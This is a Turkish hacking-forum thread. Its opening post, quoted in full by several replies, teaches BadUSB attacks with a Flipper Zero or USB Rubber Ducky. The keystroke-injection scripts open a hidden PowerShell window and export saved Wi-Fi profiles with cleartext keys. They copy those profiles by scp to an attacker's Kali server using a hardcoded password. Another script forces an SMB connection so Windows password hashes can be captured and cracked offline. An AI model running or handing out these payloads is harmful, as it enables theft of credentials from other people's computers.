[+] Flipper Zero ile Şifreleri Çalmak !

[legandrary]

Herkese selamlar bugün

Flipper Zero, siber güvenlik profesyonellerine yönelik zengin özelliklere sahip bir bilgisayar korsanlığı cihazıdır . Önceki bir yazımda Flipper Zero kullanarak . Bugün size Windows şifrelerini çalmak için BadUSB Flipper Zero saldırısını nasıl kullanacağınızı göstereceğim.



[+]Flipper Zero ile Şifreleri Çalmak

Kötü USB saldırısı, bilgisayarların klavye gibi USB aygıtlarına olan güvenini kötüye kullanan bir saldırıdır. Bu saldırıyı şifreleri elde etmek için kullanacağız. Ama aynı zamanda Flipper Zero'nun bu tür saldırıları gerçekleştirmek için gerçekten kullanışlı bir arayüz sunması nedeniyle.

1- Aşağıdaki komut dosyası 100 gecikmeyle çalışır. Bu, bilgisayarın komut dosyasını çalıştırmadan önce cihazı tanımasını sağlamak içindir

2 - Bunu "çalıştırma penceresini açar" yorumu takip eder.

3 - Daha sonra komut dosyası Windows (GUI) anahtarını ve r tuşunu çalıştırır. Bu tuş birleşimi çalıştırma iletişim kutusunu açar.

4 - Daha sonra bir metin satırı girmeden önce 100 saniyelik bir gecikme daha olur. Bu metin dizesi çalıştırma penceresine iletilir ve sisteme bir Powershell penceresi açmasını söyler.

5 - Betik daha sonra Powershell penceresinin açılması için 1000 gecikmeyle bekler.

6 - Bundan sonra script içerisine Powershell'e Assembly Name Sunum Çerçevesini eklemesini söyleyen bir satır girilir. Bu çerçeve, açılır pencereler oluşturmak için gereklidir.

7 - Komut dosyası daha sonra Enter'a girer, ardından başka bir gecikme gelir ve ardından başka bir satır gelir. Bu satır, kullanıcıya saldırıya uğradığını bildiren bir açılır pencere oluşturacaktır.

DELAY 100
REM
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Komut dosyasını bir metin dosyası olarak kaydedin ve Flipper Zero'daki BadUSB dizinine yerleştirin. Daha sonra kontrol etmek için Flipper masaüstü uygulamasını kapatmanız gerekir. Bundan sonra Flipper Zero'yu tekrar bağlayın ve Kötü USB verileri dizinine gidin . Ardından yükünüzü seçin ve başlatın.

[+]Windows Wi-Fi Şifrelerini Çalmak

Hedef bilgisayardan Wi-Fi şifrelerini almak o kadar basit değil. Sunucunuzun şifresini tahmin etmenize izin verdiği için aşağıdaki yöntemi kullanmamalısınız. Kimlik doğrulama gerektiren dosyaları sunucunuza yüklemek için SCP'yi kullanır. Bu yöntemi Wi-Fi şifrelerinin çalınmasını göstermek için kullanıyorum. Verileri e-posta veya POST isteği yoluyla bir web sunucusuna göndermek gibi daha güvenli bir yöntem kullanmalısınız.

Böylece komut dosyası Windows Komut İstemi'ni başlatır ve dizini temp dizini olarak değiştirir . Daha sonra, bilgisayarda kayıtlı erişim noktalarının Wi-Fi ağ ayarlarını dışa aktarma komutu yürütülür. Bunları % temp % dizinine XML dosyaları olarak çıkarır . Daha sonra senaryoyu kesinlikle değiştirmelisiniz. Dosyaları sunucuya aktarmak için SCP'yi kullanır. Ancak sunucu kimlik doğrulaması gerektirdiğinden bir gecikme ekler ve ardından Kali Linux şifresini girer.

Hedef bilgisayar Kaii Linux sunucunuzla daha önce iletişim kurmadıysa öncelikle SSH devre dışı bırakmayı kabul etmesi gerekeceğini unutmayın. Bu, scp komutundan sonra ve parolayı geçirmeden önce başka bir "ENTER" eklenerek gerçekleştirilebilir .

REM  Wifi
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM  Wi-Fi   XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM Kali
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

Aşağıdaki görüntüde dosyaların SCP aracı kullanılarak Kali Linux sunucusuna başarıyla aktarıldığını görebilirsiniz .

Aşağıdaki resim bir dosya üzerinde çalışan cat komutunun sonucunu göstermektedir . Vurgulanan alan Süper Güvenli Erişim Noktası adı verilen erişim noktasının şifresidir . Şifre - Şifre1337 ! @ .

[+]Windows parola karmalarını çalmak

Aşağıdaki payload Hak5 web sitesinden alınmıştır ve etki alanına katılan makinelere karşı etkili bir saldırıdır. Ek olarak, Windows parola karmalarını birkaç saniye içinde çalmanıza olanak tanır. Uygulanması Impacket smbserver.py Python betiğinin kullanılmasını gerektirir .

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Legandrary
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

Aşağıdaki ekran görüntüsü, yukarıda açıklanan USB Rubber Ducky verisi kullanılarak Windows şifre karmalarının çalınmasını göstermektedir. Gördüğünüz gibi, ana bilgisayardaki [FONT=Monaco, Menlo, Consolas, Roboto Mono, Andale Mono, Ubuntu Mono, monospace]xxx[/FONT] kullanıcısı , şifre karmasını ileterek SMB sunucusunda başarıyla kimlik doğrulaması yaptı. Artık bu hash çevrimdışı olarak kırılabiliyor.

[+]Sonuç


Şahsen ben Flipper Zero ile çalışmaktan çok keyif alıyorum . BadUSB özelliğini bu kadar sevmemin nedeni kullanıcı dostu arayüzünden kaynaklanmaktadır. Yüklerin seçilmesi için kullanıcı dostu bir arayüze sahip olmak, kullanılabilirliği büyük ölçüde artırır. Bu, birden fazla veriyi depolamanıza ve bunlardan birini kolayca seçmenize olanak tanır; bu, fiziksel penetrasyon (penttest) gerçekleştirirken çok yararlı olabilir. BadUSB saldırısını Windows, Linux ve macOS bilgisayarlarda kullanabilir ve Flipper'a farklı işletim sistemleri için farklı payloadlar yükleyebilirsiniz.

 

[slowbaskan123]

Herkese selamlar bugün

Flipper Zero, siber güvenlik profesyonellerine yönelik zengin özelliklere sahip bir bilgisayar korsanlığı cihazıdır . Önceki bir yazımda Flipper Zero kullanarak macOS'a nasıl saldırılacağını göstermiştim . Bugün size Windows şifrelerini çalmak için BadUSB Flipper Zero saldırısını nasıl kullanacağınızı göstereceğim.



[+]Flipper Zero ile Şifreleri Çalmak

Kötü USB saldırısı, bilgisayarların klavye gibi USB aygıtlarına olan güvenini kötüye kullanan bir saldırıdır. Bu saldırıyı şifreleri elde etmek için kullanacağız. Ama aynı zamanda Flipper Zero'nun bu tür saldırıları gerçekleştirmek için gerçekten kullanışlı bir arayüz sunması nedeniyle.

1- Aşağıdaki komut dosyası 100 gecikmeyle çalışır. Bu, bilgisayarın komut dosyasını çalıştırmadan önce cihazı tanımasını sağlamak içindir

2 - Bunu "çalıştırma penceresini açar" yorumu takip eder.

3 - Daha sonra komut dosyası Windows (GUI) anahtarını ve r tuşunu çalıştırır. Bu tuş birleşimi çalıştırma iletişim kutusunu açar.

4 - Daha sonra bir metin satırı girmeden önce 100 saniyelik bir gecikme daha olur. Bu metin dizesi çalıştırma penceresine iletilir ve sisteme bir Powershell penceresi açmasını söyler.

5 - Betik daha sonra Powershell penceresinin açılması için 1000 gecikmeyle bekler.

6 - Bundan sonra script içerisine Powershell'e Assembly Name Sunum Çerçevesini eklemesini söyleyen bir satır girilir. Bu çerçeve, açılır pencereler oluşturmak için gereklidir.

7 - Komut dosyası daha sonra Enter'a girer, ardından başka bir gecikme gelir ve ardından başka bir satır gelir. Bu satır, kullanıcıya saldırıya uğradığını bildiren bir açılır pencere oluşturacaktır.

DELAY 100
REM
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Komut dosyasını bir metin dosyası olarak kaydedin ve Flipper Zero'daki BadUSB dizinine yerleştirin. Daha sonra kontrol etmek için Flipper masaüstü uygulamasını kapatmanız gerekir. Bundan sonra Flipper Zero'yu tekrar bağlayın ve Kötü USB verileri dizinine gidin . Ardından yükünüzü seçin ve başlatın.

[+]Windows Wi-Fi Şifrelerini Çalmak

Hedef bilgisayardan Wi-Fi şifrelerini almak o kadar basit değil. Sunucunuzun şifresini tahmin etmenize izin verdiği için aşağıdaki yöntemi kullanmamalısınız. Kimlik doğrulama gerektiren dosyaları sunucunuza yüklemek için SCP'yi kullanır. Bu yöntemi Wi-Fi şifrelerinin çalınmasını göstermek için kullanıyorum. Verileri e-posta veya POST isteği yoluyla bir web sunucusuna göndermek gibi daha güvenli bir yöntem kullanmalısınız.

Böylece komut dosyası Windows Komut İstemi'ni başlatır ve dizini temp dizini olarak değiştirir . Daha sonra, bilgisayarda kayıtlı erişim noktalarının Wi-Fi ağ ayarlarını dışa aktarma komutu yürütülür. Bunları % temp % dizinine XML dosyaları olarak çıkarır . Daha sonra senaryoyu kesinlikle değiştirmelisiniz. Dosyaları sunucuya aktarmak için SCP'yi kullanır. Ancak sunucu kimlik doğrulaması gerektirdiğinden bir gecikme ekler ve ardından Kali Linux şifresini girer.

Hedef bilgisayar Kaii Linux sunucunuzla daha önce iletişim kurmadıysa öncelikle SSH devre dışı bırakmayı kabul etmesi gerekeceğini unutmayın. Bu, scp komutundan sonra ve parolayı geçirmeden önce başka bir "ENTER" eklenerek gerçekleştirilebilir .

REM  Wifi
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM  Wi-Fi   XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM Kali
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

Aşağıdaki görüntüde dosyaların SCP aracı kullanılarak Kali Linux sunucusuna başarıyla aktarıldığını görebilirsiniz .

[B][COLOR=rgb(204, 204, 204)]Aşağıdaki resim bir dosya üzerinde[/COLOR][/B] çalışan cat komutunun sonucunu göstermektedir . Vurgulanan alan Süper Güvenli Erişim Noktası adı verilen erişim noktasının şifresidir . [B][COLOR=rgb(204, 204, 204)]Şifre - Şifre1337 ! @ .[/COLOR][/B]

[+]Windows parola karmalarını çalmak

Aşağıdaki payload Hak5 web sitesinden alınmıştır ve etki alanına katılan makinelere karşı etkili bir saldırıdır. Ek olarak, Windows parola karmalarını birkaç saniye içinde çalmanıza olanak tanır. Uygulanması Impacket smbserver.py Python betiğinin kullanılmasını gerektirir .

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Legandrary
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

Aşağıdaki ekran görüntüsü, yukarıda açıklanan USB Rubber Ducky verisi kullanılarak Windows şifre karmalarının çalınmasını göstermektedir. Gördüğünüz gibi, ana bilgisayardaki [FONT=Monaco, Menlo, Consolas, Roboto Mono, Andale Mono, Ubuntu Mono, monospace]xxx[/FONT] kullanıcısı , şifre karmasını ileterek SMB sunucusunda başarıyla kimlik doğrulaması yaptı. Artık bu hash çevrimdışı olarak kırılabiliyor.

[+]Sonuç


Şahsen ben Flipper Zero ile çalışmaktan çok keyif alıyorum . BadUSB özelliğini bu kadar sevmemin nedeni kullanıcı dostu arayüzünden kaynaklanmaktadır. Yüklerin seçilmesi için kullanıcı dostu bir arayüze sahip olmak, kullanılabilirliği büyük ölçüde artırır. Bu, birden fazla veriyi depolamanıza ve bunlardan birini kolayca seçmenize olanak tanır; bu, fiziksel penetrasyon (penttest) gerçekleştirirken çok yararlı olabilir. BadUSB saldırısını Windows, Linux ve macOS bilgisayarlarda kullanabilir ve Flipper'a farklı işletim sistemleri için farklı payloadlar yükleyebilirsiniz.

Yine anlamadığım konular ama emek verilmiş belli eline sağlık.

 

[legandrary]

Yine anlamadığım konular ama emek verilmiş belli eline sağlık.

Eyw dost yazman yeterli

 

[BULUT’]

Ellerine sağlık.

 

[legandrary]

Ellerine sağlık.

Teşekkür ederim.

 

[MPT-76]

Eline, emeğine sağlık.

 

[ARWENDA]

Ellerinize sağlık.

 

[NaqerMoruq]

Herkese selamlar bugün

Flipper Zero, siber güvenlik profesyonellerine yönelik zengin özelliklere sahip bir bilgisayar korsanlığı cihazıdır . Önceki bir yazımda Flipper Zero kullanarak . Bugün size Windows şifrelerini çalmak için BadUSB Flipper Zero saldırısını nasıl kullanacağınızı göstereceğim.



[+]Flipper Zero ile Şifreleri Çalmak

Kötü USB saldırısı, bilgisayarların klavye gibi USB aygıtlarına olan güvenini kötüye kullanan bir saldırıdır. Bu saldırıyı şifreleri elde etmek için kullanacağız. Ama aynı zamanda Flipper Zero'nun bu tür saldırıları gerçekleştirmek için gerçekten kullanışlı bir arayüz sunması nedeniyle.

1- Aşağıdaki komut dosyası 100 gecikmeyle çalışır. Bu, bilgisayarın komut dosyasını çalıştırmadan önce cihazı tanımasını sağlamak içindir

2 - Bunu "çalıştırma penceresini açar" yorumu takip eder.

3 - Daha sonra komut dosyası Windows (GUI) anahtarını ve r tuşunu çalıştırır. Bu tuş birleşimi çalıştırma iletişim kutusunu açar.

4 - Daha sonra bir metin satırı girmeden önce 100 saniyelik bir gecikme daha olur. Bu metin dizesi çalıştırma penceresine iletilir ve sisteme bir Powershell penceresi açmasını söyler.

5 - Betik daha sonra Powershell penceresinin açılması için 1000 gecikmeyle bekler.

6 - Bundan sonra script içerisine Powershell'e Assembly Name Sunum Çerçevesini eklemesini söyleyen bir satır girilir. Bu çerçeve, açılır pencereler oluşturmak için gereklidir.

7 - Komut dosyası daha sonra Enter'a girer, ardından başka bir gecikme gelir ve ardından başka bir satır gelir. Bu satır, kullanıcıya saldırıya uğradığını bildiren bir açılır pencere oluşturacaktır.

DELAY 100
REM
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Komut dosyasını bir metin dosyası olarak kaydedin ve Flipper Zero'daki BadUSB dizinine yerleştirin. Daha sonra kontrol etmek için Flipper masaüstü uygulamasını kapatmanız gerekir. Bundan sonra Flipper Zero'yu tekrar bağlayın ve Kötü USB verileri dizinine gidin . Ardından yükünüzü seçin ve başlatın.

[+]Windows Wi-Fi Şifrelerini Çalmak

Hedef bilgisayardan Wi-Fi şifrelerini almak o kadar basit değil. Sunucunuzun şifresini tahmin etmenize izin verdiği için aşağıdaki yöntemi kullanmamalısınız. Kimlik doğrulama gerektiren dosyaları sunucunuza yüklemek için SCP'yi kullanır. Bu yöntemi Wi-Fi şifrelerinin çalınmasını göstermek için kullanıyorum. Verileri e-posta veya POST isteği yoluyla bir web sunucusuna göndermek gibi daha güvenli bir yöntem kullanmalısınız.

Böylece komut dosyası Windows Komut İstemi'ni başlatır ve dizini temp dizini olarak değiştirir . Daha sonra, bilgisayarda kayıtlı erişim noktalarının Wi-Fi ağ ayarlarını dışa aktarma komutu yürütülür. Bunları % temp % dizinine XML dosyaları olarak çıkarır . Daha sonra senaryoyu kesinlikle değiştirmelisiniz. Dosyaları sunucuya aktarmak için SCP'yi kullanır. Ancak sunucu kimlik doğrulaması gerektirdiğinden bir gecikme ekler ve ardından Kali Linux şifresini girer.

Hedef bilgisayar Kaii Linux sunucunuzla daha önce iletişim kurmadıysa öncelikle SSH devre dışı bırakmayı kabul etmesi gerekeceğini unutmayın. Bu, scp komutundan sonra ve parolayı geçirmeden önce başka bir "ENTER" eklenerek gerçekleştirilebilir .

REM  Wifi
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM  Wi-Fi   XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM Kali
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

Aşağıdaki görüntüde dosyaların SCP aracı kullanılarak Kali Linux sunucusuna başarıyla aktarıldığını görebilirsiniz .

Aşağıdaki resim bir dosya üzerinde çalışan cat komutunun sonucunu göstermektedir . Vurgulanan alan Süper Güvenli Erişim Noktası adı verilen erişim noktasının şifresidir . Şifre - Şifre1337 ! @ .

[+]Windows parola karmalarını çalmak

Aşağıdaki payload Hak5 web sitesinden alınmıştır ve etki alanına katılan makinelere karşı etkili bir saldırıdır. Ek olarak, Windows parola karmalarını birkaç saniye içinde çalmanıza olanak tanır. Uygulanması Impacket smbserver.py Python betiğinin kullanılmasını gerektirir .

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Legandrary
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

Aşağıdaki ekran görüntüsü, yukarıda açıklanan USB Rubber Ducky verisi kullanılarak Windows şifre karmalarının çalınmasını göstermektedir. Gördüğünüz gibi, ana bilgisayardaki [FONT=Monaco, Menlo, Consolas, Roboto Mono, Andale Mono, Ubuntu Mono, monospace]xxx[/FONT] kullanıcısı , şifre karmasını ileterek SMB sunucusunda başarıyla kimlik doğrulaması yaptı. Artık bu hash çevrimdışı olarak kırılabiliyor.

[+]Sonuç


Şahsen ben Flipper Zero ile çalışmaktan çok keyif alıyorum . BadUSB özelliğini bu kadar sevmemin nedeni kullanıcı dostu arayüzünden kaynaklanmaktadır. Yüklerin seçilmesi için kullanıcı dostu bir arayüze sahip olmak, kullanılabilirliği büyük ölçüde artırır. Bu, birden fazla veriyi depolamanıza ve bunlardan birini kolayca seçmenize olanak tanır; bu, fiziksel penetrasyon (penttest) gerçekleştirirken çok yararlı olabilir. BadUSB saldırısını Windows, Linux ve macOS bilgisayarlarda kullanabilir ve Flipper'a farklı işletim sistemleri için farklı payloadlar yükleyebilirsiniz.

Bad usb nerden alabilirim önreceğin bir yer varmıdır

 

[BlackDynamite]

Eline Sağlık

 

[legandrary]

Eline, emeğine sağlık.

Ellerinize sağlık.

Eline Sağlık

Teşekkür ederim

Bad usb nerden alabilirim önreceğin bir yer varmıdır

hak5'ın rubber ducky'sini alabilirsin,

 

[NaqerMoruq]

Teşekkür ederim

hak5'ın rubber ducky'sini alabilirsin,

hocam daha bütce dostu yokmu trde fln çok pahalı bunlar

 

[slowbaskan123]

hocam daha bütce dostu yokmu trde fln çok pahalı bunlar

ESP alıp kendin kodlayabilirsin.

 

[BlackDynamite]

buda hackrf anten felan takıyorsun buna yada sinyal alıcı felan wifi adaptörü üsteki aletin daha gelismisi kısaca

 

[İnterestHacker]

Herkese selamlar bugün

Flipper Zero, siber güvenlik profesyonellerine yönelik zengin özelliklere sahip bir bilgisayar korsanlığı cihazıdır . Önceki bir yazımda Flipper Zero kullanarak . Bugün size Windows şifrelerini çalmak için BadUSB Flipper Zero saldırısını nasıl kullanacağınızı göstereceğim.



[+]Flipper Zero ile Şifreleri Çalmak

Kötü USB saldırısı, bilgisayarların klavye gibi USB aygıtlarına olan güvenini kötüye kullanan bir saldırıdır. Bu saldırıyı şifreleri elde etmek için kullanacağız. Ama aynı zamanda Flipper Zero'nun bu tür saldırıları gerçekleştirmek için gerçekten kullanışlı bir arayüz sunması nedeniyle.

1- Aşağıdaki komut dosyası 100 gecikmeyle çalışır. Bu, bilgisayarın komut dosyasını çalıştırmadan önce cihazı tanımasını sağlamak içindir

2 - Bunu "çalıştırma penceresini açar" yorumu takip eder.

3 - Daha sonra komut dosyası Windows (GUI) anahtarını ve r tuşunu çalıştırır. Bu tuş birleşimi çalıştırma iletişim kutusunu açar.

4 - Daha sonra bir metin satırı girmeden önce 100 saniyelik bir gecikme daha olur. Bu metin dizesi çalıştırma penceresine iletilir ve sisteme bir Powershell penceresi açmasını söyler.

5 - Betik daha sonra Powershell penceresinin açılması için 1000 gecikmeyle bekler.

6 - Bundan sonra script içerisine Powershell'e Assembly Name Sunum Çerçevesini eklemesini söyleyen bir satır girilir. Bu çerçeve, açılır pencereler oluşturmak için gereklidir.

7 - Komut dosyası daha sonra Enter'a girer, ardından başka bir gecikme gelir ve ardından başka bir satır gelir. Bu satır, kullanıcıya saldırıya uğradığını bildiren bir açılır pencere oluşturacaktır.

DELAY 100
REM
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Komut dosyasını bir metin dosyası olarak kaydedin ve Flipper Zero'daki BadUSB dizinine yerleştirin. Daha sonra kontrol etmek için Flipper masaüstü uygulamasını kapatmanız gerekir. Bundan sonra Flipper Zero'yu tekrar bağlayın ve Kötü USB verileri dizinine gidin . Ardından yükünüzü seçin ve başlatın.

[+]Windows Wi-Fi Şifrelerini Çalmak

Hedef bilgisayardan Wi-Fi şifrelerini almak o kadar basit değil. Sunucunuzun şifresini tahmin etmenize izin verdiği için aşağıdaki yöntemi kullanmamalısınız. Kimlik doğrulama gerektiren dosyaları sunucunuza yüklemek için SCP'yi kullanır. Bu yöntemi Wi-Fi şifrelerinin çalınmasını göstermek için kullanıyorum. Verileri e-posta veya POST isteği yoluyla bir web sunucusuna göndermek gibi daha güvenli bir yöntem kullanmalısınız.

Böylece komut dosyası Windows Komut İstemi'ni başlatır ve dizini temp dizini olarak değiştirir . Daha sonra, bilgisayarda kayıtlı erişim noktalarının Wi-Fi ağ ayarlarını dışa aktarma komutu yürütülür. Bunları % temp % dizinine XML dosyaları olarak çıkarır . Daha sonra senaryoyu kesinlikle değiştirmelisiniz. Dosyaları sunucuya aktarmak için SCP'yi kullanır. Ancak sunucu kimlik doğrulaması gerektirdiğinden bir gecikme ekler ve ardından Kali Linux şifresini girer.

Hedef bilgisayar Kaii Linux sunucunuzla daha önce iletişim kurmadıysa öncelikle SSH devre dışı bırakmayı kabul etmesi gerekeceğini unutmayın. Bu, scp komutundan sonra ve parolayı geçirmeden önce başka bir "ENTER" eklenerek gerçekleştirilebilir .

REM  Wifi
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM  Wi-Fi   XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM Kali
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

Aşağıdaki görüntüde dosyaların SCP aracı kullanılarak Kali Linux sunucusuna başarıyla aktarıldığını görebilirsiniz .

Aşağıdaki resim bir dosya üzerinde çalışan cat komutunun sonucunu göstermektedir . Vurgulanan alan Süper Güvenli Erişim Noktası adı verilen erişim noktasının şifresidir . Şifre - Şifre1337 ! @ .

[+]Windows parola karmalarını çalmak

Aşağıdaki payload Hak5 web sitesinden alınmıştır ve etki alanına katılan makinelere karşı etkili bir saldırıdır. Ek olarak, Windows parola karmalarını birkaç saniye içinde çalmanıza olanak tanır. Uygulanması Impacket smbserver.py Python betiğinin kullanılmasını gerektirir .

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Legandrary
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

Aşağıdaki ekran görüntüsü, yukarıda açıklanan USB Rubber Ducky verisi kullanılarak Windows şifre karmalarının çalınmasını göstermektedir. Gördüğünüz gibi, ana bilgisayardaki [FONT=Monaco, Menlo, Consolas, Roboto Mono, Andale Mono, Ubuntu Mono, monospace]xxx[/FONT] kullanıcısı , şifre karmasını ileterek SMB sunucusunda başarıyla kimlik doğrulaması yaptı. Artık bu hash çevrimdışı olarak kırılabiliyor.

[+]Sonuç


Şahsen ben Flipper Zero ile çalışmaktan çok keyif alıyorum . BadUSB özelliğini bu kadar sevmemin nedeni kullanıcı dostu arayüzünden kaynaklanmaktadır. Yüklerin seçilmesi için kullanıcı dostu bir arayüze sahip olmak, kullanılabilirliği büyük ölçüde artırır. Bu, birden fazla veriyi depolamanıza ve bunlardan birini kolayca seçmenize olanak tanır; bu, fiziksel penetrasyon (penttest) gerçekleştirirken çok yararlı olabilir. BadUSB saldırısını Windows, Linux ve macOS bilgisayarlarda kullanabilir ve Flipper'a farklı işletim sistemleri için farklı payloadlar yükleyebilirsiniz.

Eline sağlık

 

[OBT is HeRYerDe]

Eline Sağlık.

 

[legandrary]

Eline sağlık

Eline Sağlık.

Teşekkür ederim

 

[ATE$]

Ellerine sağlık, gayet açık bir anlatım olmuş. Attiny85 alıp da kodlanılabilir. Hacim olarak da daha küçük ve böyle işleleri yerine getirebilir.

 

[legandrary]

Ellerine sağlık, gayet açık bir anlatım olmuş. Attiny85 alıp da kodlanılabilir. Hacim olarak da daha küçük ve böyle işleleri yerine getirebilir.

Teşekkür ederim Dostum

 

[ferah-KaRoN]

Herkese selamlar bugün

Flipper Zero, siber güvenlik profesyonellerine yönelik zengin özelliklere sahip bir bilgisayar korsanlığı cihazıdır . Önceki bir yazımda Flipper Zero kullanarak . Bugün size Windows şifrelerini çalmak için BadUSB Flipper Zero saldırısını nasıl kullanacağınızı göstereceğim.



[+]Flipper Zero ile Şifreleri Çalmak

Kötü USB saldırısı, bilgisayarların klavye gibi USB aygıtlarına olan güvenini kötüye kullanan bir saldırıdır. Bu saldırıyı şifreleri elde etmek için kullanacağız. Ama aynı zamanda Flipper Zero'nun bu tür saldırıları gerçekleştirmek için gerçekten kullanışlı bir arayüz sunması nedeniyle.

1- Aşağıdaki komut dosyası 100 gecikmeyle çalışır. Bu, bilgisayarın komut dosyasını çalıştırmadan önce cihazı tanımasını sağlamak içindir

2 - Bunu "çalıştırma penceresini açar" yorumu takip eder.

3 - Daha sonra komut dosyası Windows (GUI) anahtarını ve r tuşunu çalıştırır. Bu tuş birleşimi çalıştırma iletişim kutusunu açar.

4 - Daha sonra bir metin satırı girmeden önce 100 saniyelik bir gecikme daha olur. Bu metin dizesi çalıştırma penceresine iletilir ve sisteme bir Powershell penceresi açmasını söyler.

5 - Betik daha sonra Powershell penceresinin açılması için 1000 gecikmeyle bekler.

6 - Bundan sonra script içerisine Powershell'e Assembly Name Sunum Çerçevesini eklemesini söyleyen bir satır girilir. Bu çerçeve, açılır pencereler oluşturmak için gereklidir.

7 - Komut dosyası daha sonra Enter'a girer, ardından başka bir gecikme gelir ve ardından başka bir satır gelir. Bu satır, kullanıcıya saldırıya uğradığını bildiren bir açılır pencere oluşturacaktır.

DELAY 100
REM
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Komut dosyasını bir metin dosyası olarak kaydedin ve Flipper Zero'daki BadUSB dizinine yerleştirin. Daha sonra kontrol etmek için Flipper masaüstü uygulamasını kapatmanız gerekir. Bundan sonra Flipper Zero'yu tekrar bağlayın ve Kötü USB verileri dizinine gidin . Ardından yükünüzü seçin ve başlatın.

[+]Windows Wi-Fi Şifrelerini Çalmak

Hedef bilgisayardan Wi-Fi şifrelerini almak o kadar basit değil. Sunucunuzun şifresini tahmin etmenize izin verdiği için aşağıdaki yöntemi kullanmamalısınız. Kimlik doğrulama gerektiren dosyaları sunucunuza yüklemek için SCP'yi kullanır. Bu yöntemi Wi-Fi şifrelerinin çalınmasını göstermek için kullanıyorum. Verileri e-posta veya POST isteği yoluyla bir web sunucusuna göndermek gibi daha güvenli bir yöntem kullanmalısınız.

Böylece komut dosyası Windows Komut İstemi'ni başlatır ve dizini temp dizini olarak değiştirir . Daha sonra, bilgisayarda kayıtlı erişim noktalarının Wi-Fi ağ ayarlarını dışa aktarma komutu yürütülür. Bunları % temp % dizinine XML dosyaları olarak çıkarır . Daha sonra senaryoyu kesinlikle değiştirmelisiniz. Dosyaları sunucuya aktarmak için SCP'yi kullanır. Ancak sunucu kimlik doğrulaması gerektirdiğinden bir gecikme ekler ve ardından Kali Linux şifresini girer.

Hedef bilgisayar Kaii Linux sunucunuzla daha önce iletişim kurmadıysa öncelikle SSH devre dışı bırakmayı kabul etmesi gerekeceğini unutmayın. Bu, scp komutundan sonra ve parolayı geçirmeden önce başka bir "ENTER" eklenerek gerçekleştirilebilir .

REM  Wifi
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM  Wi-Fi   XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM Kali
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

Aşağıdaki görüntüde dosyaların SCP aracı kullanılarak Kali Linux sunucusuna başarıyla aktarıldığını görebilirsiniz .

Aşağıdaki resim bir dosya üzerinde çalışan cat komutunun sonucunu göstermektedir . Vurgulanan alan Süper Güvenli Erişim Noktası adı verilen erişim noktasının şifresidir . Şifre - Şifre1337 ! @ .

[+]Windows parola karmalarını çalmak

Aşağıdaki payload Hak5 web sitesinden alınmıştır ve etki alanına katılan makinelere karşı etkili bir saldırıdır. Ek olarak, Windows parola karmalarını birkaç saniye içinde çalmanıza olanak tanır. Uygulanması Impacket smbserver.py Python betiğinin kullanılmasını gerektirir .

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Legandrary
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

